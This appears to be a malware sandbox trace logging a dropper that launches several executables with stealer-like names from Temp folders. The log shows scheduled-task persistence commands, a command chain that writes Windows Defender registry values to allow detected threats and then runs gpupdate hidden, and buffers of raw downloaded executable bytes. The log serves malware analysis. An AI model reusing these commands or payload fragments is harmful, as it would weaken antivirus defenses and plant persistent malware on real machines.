filepath_r: C:\Users\test22\AppData\Local\Temp\1000016001\a2772ea559.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000016001\a2772ea559.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000017001\db324166b9.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000017001\db324166b9.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\8254624243\axplong.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\8254624243\axplong.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000005001\judit.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000005001\judit.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000007001\redline123123.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000007001\redline123123.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000008001\upd.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000008001\upd.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000025001\setup222.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000025001\setup222.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000035001\gold.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000035001\gold.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000047001\lummac2.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000047001\lummac2.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000060001\onecommander.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000060001\onecommander.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000063001\drivermanager.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000063001\drivermanager.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000064001\NewKindR.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000064001\NewKindR.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000068001\servoces64.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000068001\servoces64.exe
1 1 0

CreateProcessInternalW

thread_identifier: 2708
thread_handle: 0x0000015c
process_identifier: 2704
current_directory:
filepath:
track: 1
command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x00000160
1 1 0

CreateProcessInternalW

thread_identifier: 2072
thread_handle: 0x00000168
process_identifier: 1152
current_directory:
filepath:
track: 1
command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x00000164
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: SCHTASKS
parameters: /Create /SC MINUTE /MO 1 /TN NewKindR.exe /TR "C:\Users\test22\AppData\Local\Temp\1000064001\NewKindR.exe" /F
filepath: SCHTASKS
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000304001\b2c2c1.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000304001\b2c2c1.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000306001\FirstZ.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000306001\FirstZ.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000307001\setup.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000307001\setup.exe
1 1 0

CreateProcessInternalW

thread_identifier: 4024
thread_handle: 0x00000360
process_identifier: 4020
current_directory: C:\Users\test22\AppData\Local\Temp\7zSB4F3.tmp
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
filepath_r: C:\Windows\System32\cmd.exe
stack_pivoted: 0
creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_SUSPENDED|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000368
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd
parameters: /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
filepath: cmd
1 1 0

CreateProcessInternalW

thread_identifier: 3660
thread_handle: 0x00000128
process_identifier: 3696
current_directory: C:\Users\test22\AppData\Local\Temp\7zSB4F3.tmp
filepath: C:\Windows\System32\forfiles.exe
track: 1
command_line: forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
filepath_r: C:\Windows\system32\forfiles.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x0000012c
1 1 0

CreateProcessInternalW

thread_identifier: 2144
thread_handle: 0x0000011c
process_identifier: 2148
current_directory:
filepath: C:\Windows\SysWOW64\cmd.exe
track: 1
command_line: /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
filepath_r: C:\Windows\SysWOW64\cmd.exe
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 0
process_handle: 0x00000120
1 1 0

CreateProcessInternalW

thread_identifier: 3888
thread_handle: 0x00000128
process_identifier: 3880
current_directory: c:\windows\system32
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: powershell start-process -WindowStyle Hidden gpupdate.exe /force
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x0000012c
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Windows\system32\gpupdate.exe
parameters: /force
filepath: C:\Windows\System32\gpupdate.exe
1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 3912
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 1425408
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x10001000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Time & API Arguments Status Return Repeated

InternetReadFile

buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $j™ä.øs·.øs·.øs·e€p¶%øs·e€v¶îøs·e€t¶/øs·ìyŽ·*øs·ìyw¶=øs·ìyp¶4øs·ìyv¶uøs·e€w¶6øs·e€u¶/øs·e€r¶5øs·.ør·ùs·Ýzz¶2øs·ÝzŒ·/øs·.øä·/øs·Ýzq¶/øs·Rich.øs·PELiLfà '¼|°ÿRÐ@ S@€8@IÔ`°(@I°8@IÀ< @à€Ð@ @àPPB @à  J @à À\ @à.rsrc`\ @àÐ/p` @à.dataThà @IÖ ` @à¦ü¸d½ÎŽ¯['&@²á ¾)/¸ñY4ñ5ÃKêÏé½£0¦>šÓûAìï^!ÉkEO¬q Z¥d8<ïǑ¶ú×ƅœý Ëa nú…uŒ”_etœºáô!OÔÕ2K:ܬÁA×ÀM~6KìkÔ¿~¿Ë#ñ]ô7phäqVÏ}°5´z°‰YѬVøax˜º©Z‚EÙڇʈêV”ê¹üÀÛ«H"üÐí‹î<z‘"D©ކ Rgí YI@áª/ ‡Á°±hà‘Ü"mÐf¿]-k¿ô7uZ³2 ^}Δ–!=#‘º0¾ÏÖCÕßs mĉPÏ&mÃ'7•bghø2ʼnó.5"tŸÊƒ©±6îž ˆö@Q‘é/•·Ï¼ªÐ1þþy²òéZ Âj»<BÌ^ýþ_ŽpŽ‚2Ò¹RÒDrâa=RZã ©£J7»r¿˜ÇR[+ë¸T€’æ}ï,Þbr%r87¯ü+¢¨Q"€¸0µG7aµ‹9SY^‘áÊ >bV ªu÷ä×¶eûLŤ]æºåšM›av¦Xr‘ÑlLˆ»'KF/SýDžñ²"ø_5µ>wѐvç9+¡6¯4jè¡Œ}´AÚwœ‘ …ÞهÆ.„®ú¯°ÝxTÖ{’QD™“©Á……„µ è„&Eìð•n÷̃'*f JÂ:S–9 B0†q©"ËlÉ𠖕÷rҋÍ-jOŠ›ZŽ|Ô?XfÉêíåÝC9NEN°óAJCt%—>¢ÜÎÂÈ7B$¦`㠓pÁ8ÇÚZª¬Ø€JðkÅ xd63Öÿ7·Žê¼/,Ç:i¯"TÓϽ˜¯ZdÆH02ÿÓ̤õé×æ x}'ßVŒNVÈç´Êy¦m³DBÊÎÄ>ì¥&o™eâÊÜ3|ܝæ˜`3’uÀ>}­ùvR3œy©Í ÜGÃñ‡Î±2+拔‡xSI‹ª<0 e§$)[ÀƒCÿļ·ì„•€›#t@D oî&¯zµ«·,ãh½Âf-#üä%ð_e9‚õ€Ê½€[J›üj¦°pԕ‡Å¯†ˆåO?•O®Ä$£äÄÓTÏ+¿z>Ôb&/Æ*ðSfgDÞ{|ñÏã¡rèøn§ Ú¿ ídëII{p<_¬ éü`êL·¯sˆpÐÛ\^³[ôëbXæÇoԗ¿ê,;ŽQ§På%ômÜÁó¶ü-]覲bA°czvï Ü&oñu­£#âm~–]¦·ˆñU{‡¸`Ɖwü€[éüŽ+¡™6á§wf@çÐ/‹¸«ÁµØ³rŠ»GE†Œ¿|5 +ϒGÅB|z0Xì ÆÜìÚHs¿Œ”IroËb¹4´+þãƒÕÞ%K¶ƒÞSîë_ýÖnb2ﭘ÷ÜZŠš87Ÿ‹G—"ƒðŠ­k/¼Rv£[¤OUFÒ-´aYƒý4ÙóÌÄ›TÙ[½® uáÎìHq¥ÒkM‰ ²vÑ͈?Ҋ·Ìfv…ÓíªÉ~“‘`ïMÙʬ¢úøqvéO³`TYtêWêÐ*§ÌØG]¡ÞÏ9€L„wT+zÉ/øÎQŒñÃ$`ÙI<ƒd‹¨7ãÐ y¦<sŠ bNüoŸc`«˜Q<HÌÓ,zv[…H—rNdÙ5×eîÔÆ Ö,HP îvd(ÚĝÜÛ-ŒÞñqq}£Ç“øÄ1çˆÐË-ÍxÃ*Ö´ên,ÄC·D~&¥&æ‡ÑæÍ <8¡G8iƒø¯ÈUòÛ¨`”²“Oì.G†-öµû³î±Ä‘º6íMâu Óÿ¬ Û´ã?~ØãoÌy2Œ‡lu›N;ôj7ÒÅ™;ñâcü‘ïH8`¦B;7ñ0ïíV|²Š ‘ifLÛ-}Ú¥%Ža@ ‰17¶’åZ†¡¸<Rńqí藶åº3;@¡“þÀ:'’ŸÉh4}—C1V)"H$ý òoÍýŒÉ—HŠã–úXÎËJ.bFfI#ŒÓ´Ÿ™Šx÷´= !9pÞ¸”hwjìôeìBi± ¾@ôÐóKkãü’2jÅS™Q”! šl63 mJšÐ Õ}yŸNŽª¢œrí?D/ŽÎ’©BzPu½ê¼gytnÿæ&‘¬Aš¤Â³B_@΄øÐ,º4˾@ÒþeqAUbߦțýàý‰ôžp1Ao¿0©íÚ(h#ìðMó둔áLÌGïX ƊÀ@ÁÎ<zY‰‡6ÂQ{fÊà9ù8Í ‰éšCŒB03@ؔ=¨¥¢:ém¹M«;‡l/Š]’ ME&/×ÜTRïµIå Æ¿Vf5ÿšÊ¹1^^Ôª¡ÚÏõ}‹ÞÞp Jq~•¥ª«A½²3\Â}FÉCëÏy­ñzÞjäÝåÝVjsö͍EÝ]×éU—^Wõ0k]èº}ì‚a±='¿H ¢EЬY¹òԅÔâZ× »úÊXäfÈ;â“ÓÅkA+«JÒÊ1þëGy‚’¾PLÇÁô› ]¿—x×^.Ûa_¡CÞ-¼ðR’“ÏŽ‹êJí.§èy8Üo£Ã]zÔúòuÔ̺8]S‡ 7jå¼,TF•È2bC«ô5…ÏÒ泛©±UlŒí÷§ì&íF<úøêÆmš°‚µHmêÌMuÿbJ‰ LXsü69õ]-âK‹ô§9Å+˜1ω흛a$í¸A:—IAëä=f0ïÓ¯4#ÚûH¦$ñÍÞåA”0ϓ½’«äéÖÄË×ÿxWse_%ÌÖ6%«~þf¡ÇLÑÅ.e!†Këy§1*­ß{i"AãrΟ“õ6@wŸÖÆA;"ŸÉ·Î8Üiè#j5s,M>Ô_H8Åšý^Y#¸£†bGk{Ùz­³Æ~¨7„¦lì[·¨E:Æ…ÛAm‘WAŠjȱ83=·ü„(#宪EGºà®jã?6W@.óš8Z£ózE‡¢Ç˜Ã ?-Îy‹—JŽRnÀÿRæZf4`(-í×qY”rtÛÒ]å[ý~Çyý SÔå´ýçl«7)G¹aë?çÎd¿qô™\Ë%Z.Òc«?ðíð˜[‰i^;ü(¾Çã`V­®Ï€¹^Œ±M&QJxƒìï,ÍdþÔÍÛЊTÄ£$s³™BY4ç:¨[³•~$ÿÚ†*jŤõl¡Ñh[X\…Â}*l]Q¨û}’/€qa~]€¶ýG‹ ‚­¿á6˜˜#ۖ/¯·–¦> ùmvfêrdŒ: Ë°ò¿|jUi S…8ü Bö3 b8\ `»îpáž%ȋÓÅûÊë–ÖóÃñ´À×E¶/[Ãÿ¯/šÿ {éµÞ%a~ñ¬¡uرbZÀíj %&£­u"ÁMۉ2¢·SfùXry)›À_æç؄0klBM3Æ3Ý_¦?lÉѵ7xUQ&3ãéñÜýPxò%ysÎV¤9É–±Â¾[}iQ÷+x 1ãEnûÌQ~´Go|exx÷:Dx5Ÿ„?éB։ õö÷ôC ÆåL=ŽÞߧH’pÞ²££ƒT€}ösæ2Û¾ƒ ÄØAA…οNâ;’ȝIíþü \$äŽú†ŒÉKˆ£üc»². ï_àÓ8l‘¶¼%'~'ÒEH´mê4úæ5GÞ!»}*:€gÜëíIJPP§³^Ø¥ƒ›š 9¢:¬q%^ù´›gS[o6 ±¯kÙyÞLškéÜêBCá4Úýåï|ÊÜþ‡-›@ JÜ}iiY€°¸‚{p†©Ék“0÷>ú®‰e˜zÐL0ýÇD(*‚SÞº"ŽˆS@9?‡¨EKÆ@®}GigTYYÐúØEr›¦zÄe5w—xC¯—(ýë}‘V«Kçd
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $ÌPJˆr>ˆr>ˆr>Ó=†r>Ó;(r>]:šr>]=žr>];ýr>Ó:œr>Ó?›r>ˆr?^r>7‰r>Á‰r><‰r>Richˆr>PEL*Ï^fà äÆ@K@pKòD@€X làì'Kœ'K €Ü@à.rsrcàì@À.idata  î@À °*°ð@àdeusfrzoÐ`1Êò@àngpoayha0K¼@à.taggant0@K"À@à
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $j™ä.øs·.øs·.øs·e€p¶%øs·e€v¶îøs·e€t¶/øs·ìyŽ·*øs·ìyw¶=øs·ìyp¶4øs·ìyv¶uøs·e€w¶6øs·e€u¶/øs·e€r¶5øs·.ør·ùs·Ýzz¶2øs·ÝzŒ·/øs·.øä·/øs·Ýzq¶/øs·Rich.øs·PELiLfà '¼|dSÐ@ S@€8@IÔ`°(@I°8@IÀ< @à€Ð@ @àPPB @à  J @à À\ @à.rsrc`\ @àÐ/p` @à.dataThà @IØ ` @à ŹZ™ÖowàB…íÓ¿ • …IYÉ÷ã÷%ê2Œp€(Ã2jRxõ½FÎ2 õ׶ºÁ<0¶sÿŒ ¾ £ Ø7ë5¡ðÎÀ|Ì×dg¥¾¶°bÛ*(èLFªñëQö ŽzlYVßÑqèÏwïl®ß‹Ë—(Ý<R£éRr¯ åÂT¡z7f£RÀ81Ûo•HBEVDÞ°·øa^¤ÀR§'ùdÏ»ìÑZ9RœÇ¾‘ƒAÿ¸ã´ñÒ«¸);úº?ØT ð#¢ÞRaé¡À“.iÁÅ>_¯¼šY.cN˜5, ×c’ëF0枾´ ])’f¸|ñ¥&]]^o™fŸÀF'v£“ÄÿŸ­psxóEª×,©÷¨•DÂP Ù\"sOô π¾?Ö÷'Œ”¢ó 콜ìüŒ¾MK4ÒmK«}.]&®V _4Íóz¹î?*ŠÁ-OªÑ®©]‚Ÿ%‹É­mn=7ÏÕË¥-.ð¨Û0sւy1¾ ºTm†ÏÇ_]éûì»32qLS» ÎxöˆááÚ¦†ð8âTà )sYŒ£KÐ* VGø˜Ý…騾L ëycLÊü§â¯$4¼pþbÆMù­SŽnCO,ý„Ñ‘–_2@× HÏýÍaS•…Žé8®¾8ñ§ÆÈt ©*–)å5Î!‘9ïøqÊ>A¨ë6k¡_ҍh¿Þ9#‘)sßT)êW¨Ìu©ãñ _ÿ{Ô¬ Ô%ûQ•AßGßéùÝÓç~ü·<^Œøå˜+,¬1ß3 Án§ìJ}2#i1<.¦E“ïȄILÔ}&||1ñpuIž ÈNFùÕ{µš÷øì'Ǫè0— ¬ˆ •ËfE­*Cç$¨;j¥ºTɬ€ÑÌ9<‚(Ê;Z•ë­v×ÜÑvȇ¶@²d•Ä¡É¯W£µ:×m¨šKpˆ‡Òí•êOmmS#>׀e¸G'MÂ¥y1)È0Qÿ«{}Í'`$Cÿ 5I˜n¾—Vý³ÁÛo¾\;ŸÖPçtpæÀö:­`¿˜\]‘ÈÊ3#9’]³“¿ œ!òŒG¡Û‹Þ åòóÈV‘’­CçÚ¦±ñ$§¼ÀJBQ(®·ÅW«œ.¯òÍâsXp–Ö}°ï˅}Ið@î,“_夶98ì\IYºL­ a g„Ô1ªîΌ[$ÊóFEðRi½KÃrYÝÇtÕ]{Au’L¹Ö!¯?t‚­‰÷‚ì·çd.á)?{éMS‘/!´/ëÅìÏ(¨Ñù[ 9oÙk̏ñê{ß û %Ïqž6k§îԂʚy_0±€¸ìW¬L†€&m-SmîíhÖc#‡$Ÿw˜«EßÈ^Í|âå‘Œç é!?È+G”LÍ}ƒ{B çHú±ï¹D@ü?VÈíÄBR Ó¹+89’+(²vXàR9»È„×PpÐ"Ç¡«¡â=¨Ž§·÷zñLT=Ý#\Þ¼ý!9É;@®þñík½ªBE½w&2””¨?ž0Gºt/̆[»üfé˜Ëˆ')Bøω‡¡ÔWÝ ‰^¢Þ¸Ý¹iVé3Ì í{dEIfZ°dñ>״׍>œ7ÆÿVd„ER`´=Nå`ք¼n'zä"Óþ…RŒêã&íˆé|ð…vÐOò‡5+*µ’Øb ;F ‘VVN ÇHÄfg¬ÝoÞ O¤¹JXÐù§Ô{g73 *Ó©~J¼DéAâ[†( ƒbp&E}jÁeÉÑ_³X£²w2–Ñý\íÛ"Ÿ/.ITxÚтÙlTײÛGJ‚iÍ«TÜwPø¥+^÷If×@̪@ÃÓ9柠õÀ*±dSf­ ûTÎR,œY~'J±Œ‹•,[4eÀŒIp8¦ë ÝÓN`%p0²6¹ç˜}ëû¯4 #—6×s¹Ìlv!cQr0æ*ÓÂhę(යÞ/Ó×FÄqhh´Ärê~½ÅEÄYN©¤ŠöG‡…Þ`>ÀüràB–+“lx|Ô¾`ÈRÑ9àáh]zmA² >µR Ê68ÜWyF¨M°‡|¸UéÐ[×ÌwQŀq µrŠxš^I¹ Ð-­nž¬ ð^‡¥>ât†‰”þÀ=}ÝÀk ŒJß¡5Á x·& ´Wuÿï9³ýš3q>ŽuW¾³­Ý³òuPøÏ˪­èQ÷X@å 2DÙ艱>š‘»lNE;þr4`PÂ¶t\Ãh»O¢dŒõÝc#0ñŽ±'C›!¶>Ç7Z › f6/¾ÙŽ©.ë•(«¬_¼tJ”îØjÚöÊÚö…„À-œå¥OB@?‹bvÀFX²ÿ†:ͱÐ#£Ÿcº"y]ÿUª™S„û–V/õë««ìél,ã™|°ä7/¯OK,I†% m@ƒ ]¿˜­ZðbÐÍÛ¬1ä¢q¼vÄUìδ¨$44¨Q˜™=jMˆœþÀÛGÎßµ´­r‹¡ÕZL˜._º6IcяGAÁ¡Rg-4ɧl}ÔcÈÁ8ð eX̀‹ÀN{פ¶ híÞRÜMÃ#MYBO¦/?ÅZt3üJTzæ¹þÂ\ÜL+Ço¬°ºYXþœ /EE¼ûpr^?—¸déÕN×5íŒÖìfã®l O{•Õù¼pé,çòêìp„½“œÿ_í¥•÷‚Ñx`6ä…x‰)[üzø‹$nÈ 3†çkÝÇb>ˆàʛ‹CðS¤Îùǵn#H“c JéÂˆR€ë^W²¤ø³Ù¼ýlDXÓ¨žÿ‘àô»bi ¤Zä?jg¿=¿†Ek¢îSñyÈNå·*A_½íßÐp„%Ȭ?G zÚ ¸J.õaÑî”ëìºÜÝ ½Üð›IµŒB!<"Yy]¼‰ž[æÒ³k¥Ï‹§ #雼î1å¥+²•d+,ŒêC¡¯Ó4†±¥¦š“ 0+m˅K%£¼ð¼›F‘=*”]Þ A·•ktÝ';DuïÿS/fÅùñ¬Û¡+²8añB“¡°—ú œÕè¥ø]=ðõ  X+7ü4Ê<X!îIìÁv덤•¦>§ ¢¢HŠ[¿+ôM=ÿÕu©­vdµ2÷GW۝üÐáö^kx:áO1ÛÔ_¨–?©ÕÞ9~¾a W";“aæ¹²£Ä&lçÛz7²âÂ;L–5ìJ Å#´ÝŸÈ†Í+yA|ô(0ˆ5KÒú¿7±'))¬#qþ'ì#þn3˜L~Ü&Ñ.9Aë Å×pTüÄ­B¼™Ú7‘ËZ[d^ž2³âßñ‹Ïº°z†ìH¾r©ÈI5hF[Ÿ+Uó^‰àòÀ;³á›«ëQ¦tîNäõîÙÑÛNë7'p)aœ^g¿õ8!º›G=}|ý$îъ¨èîÌجCft*1ÿWöN''×Ì‘Ô 7k5FòöiqW®.Öê0±kîžB2žæ©dkMAš~¼V«ãÇÜâÚ}E€CaÄB­?JÉM·œ|¦eÃÕæ âQá CÉòýBSÉÅ!—òKsˆ6¦àþӈЄšr6Ã)À$ÛC¢ä¹?D˜uÊ qàög¹ê¤Tþ)ñ†ýᵺEå½”‡©˜3;£e´Õ´§"™`ÏÃèTæ‚JŽÍö1/k€èF xx×ûšƒ(pRæ`î®,Qóz‚Wâ.ÅI•Ä 1Ô<x À¸-í\‚¬¡`Š™¬©.®uî(ùˆK¤7Á¤\_rÀî…òHÆ­Ãö%w>À_+1Æ» ³ºC2?{D¥“QTŽl ãÚ[óP¥aêfF´‘¥Ÿ؃—Zì÷$àûÞêÝÈãç`M2ƒ½ƒÕG¡ˆ›J…`dnښâ½]gZ’¿A_[U/hØÉù 3†«ÏeøêÍ~Þ]‡é½žlu N´Y?=ÿeÉÛöÑjë6‡ÿŽ?*Š >÷m] Î¡O˜ä­
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $šÇƒ®Þ¦íýÞ¦íýÞ¦íýj:ýý¦íýj:ýC¦íýj:ýý¦íý@*ýߦíýŒÎèüó¦íýŒÎéü̦íýŒÎîü˦íý×Þnýצíý×Þ~ýû¦íýÞ¦ìý÷¤íý{ÏãüŽ¦íý{Ïîüߦíý{ÏýߦíýÞ¦zýߦíý{ÏïüߦíýRichÞ¦íýPELô¹lfà" ¬ wÀ @0|@€@@dŽ |@ |a°”uð 4  @À ”.text« ¬  `.rdata‚ûÀ ü° @@.datalpÀ H¬ @À.rsrc|a@ bô @@.reloc”u°vV@B¹t Mè8ýhé#DèðYÃhó#DèƒðYÃèæÞhø#DèrðYÃèY<hý#DèaðYÃQè©h$DèOðYá0MQ‹@0MPèã#h$Dè/ðYÃèÞ%h$DèðYÃè®çh!$Dè ðYÃèA2h&$DèüïYÃèPÁh0$DèëïYù%M蝘h?$DèÕïYÃV‹ñN贇N謇j(VèâìYY‹Æ^ÂU‹ìƒì8Ç0MtÉI3ÒÇœM0ÉI‰ M‰¤MVQf‰¨Mèo¡0M‹@ǀ0M\ÉI¡0M‹H”ûÿÿ‰,M3À¹¸M£ÌM£ÐM£ÔMèY ¹èMè헹øMè㗹Mèٗ3À¹„M£TM£XM£\M£`M£dM£hM£lM£pM£tM£xM蛗3ÀǬM<ÉI¹M£”M£˜Mf£œM£ M£¤Mf£¨M£°M£´M£¸M£¼M£ÀM£ÄMÇÈM@ÉI£ÌM£ÐM£ÔMÇØM@ÉI£ÜM£àM£äMÇèM@ÉI£ìM£ðM£ôMÇøMDÉI£üM£M£M£M£MÇMèϖ¹(Mè€ÇM<ÉI3Ò¹M‰M‰M‰ M膹@M蓖3À¹„MP£`M£dM£hM£pM£tM£xMèGMÈè$P¡0M‹HÁ4M薍Mè胼MÈè{¼3ÀfÇ0Mjö£,M£ M£$M£M£M£(M£€Mf£lM¢”M¢}M£\MÿhÂI‹ð…ö… 3҉|MèÂRÿhÈI¸0M^É¡0M¹@MV‹@ǀ0MhÉI3À£4M£8M£<Mè+¹tMè!¾¨M‹Î腕h ÉI‹ÎèoW¸0M^ÂV‹ñNèe•Nè]•N$èU•‹Æ^ÃU‹ìQSVW‹ùŸ”ûÿÿ‹‹@DŽ8”ûÿÿ\ÉI‹‹P‚”ûÿÿ‰„:ûÿÿ‹‡|üÿÿ…À…i3öVVVhHÉIÿÐÇI9·dýÿÿ‡[3ö9·4ýÿÿ‡K‹Ëè®3ö9·Dýÿÿ‡€3ö9·Týÿÿ‡–·lýÿÿ‹Îè÷º3ÉÇF ‰‹‹@Ç9ˆ˜ûÿÿt5‰MüQMüQˆ”ûÿÿè/‹˜ûÿÿ‹@ÈèÆ‹‹@ǃ¸˜ûÿÿuÎÿlÈI‹Oà…É…k‹OԅÉ…u3ۉ_܋OąÉ…ãO¤‰_Ìè`ƒ€þÿÿè ·dþÿÿ‹ÎÇ<ÉIèˆÿvè¿èYŒýÿÿ荏|ýÿÿè#ƒlýÿÿè)º·\ýÿÿ‹ÎÇDÉIètÿvè‚è‹óLJLýÿÿ@ÉIY9ŸTýÿÿ‡òÿ·Pýÿÿ‰ŸTýÿÿèXè‹óLJ<ýÿÿ@ÉIY9ŸDýÿÿ‡ñÿ·@ýÿÿ‰ŸDýÿÿè.è‹óLJ,ýÿÿ@ÉIY9Ÿ4ýÿÿ‡ðÿ·0ýÿÿ‰Ÿ4ýÿÿèèY‹$ýÿÿ…É…ù·ýÿÿ‹ÎÇ<ÉIè£ÿvèÚçY‹ýÿÿ…Ʌ㋏üüÿÿ…Ʌ鍏èüÿÿè-‚Ðüÿÿ蝋Äüÿÿ…É…Ù‰ŸÌüÿÿ‹¸üÿÿ…Ʌٍlüÿÿ‰ŸÀüÿÿè\üÿÿè䁍Lüÿÿèفüÿÿèµ_^[ɡ`ýÿÿ‹°‹…Àt#ÿ0ÿ5ŒMÿÅI‹‡`ýÿÿ‹°‹…ÉtQèØùÿÿF;·dýÿÿƒfýÿÿ뿋qQèþà‹Î…ö„ 